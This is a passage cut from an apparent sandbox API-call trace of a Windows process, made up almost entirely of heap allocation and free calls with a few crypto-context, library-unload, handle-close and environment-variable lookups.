dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.057] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0258.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f48 [0258.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0258.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0258.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.060] FreeLibrary (hLibModule=0x756e0000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0258.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.060] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0258.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0258.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.061] CloseHandle (hObject=0x2d0) returned 1 [0258.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0258.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0258.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0258.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0258.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0258.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0258.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0258.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0258.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0258.066] CloseHandle (hObject=0x2a0) returned 1 [0258.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0258.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0258.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0258.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0258.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0258.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0258.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0258.210] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0258.210] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: 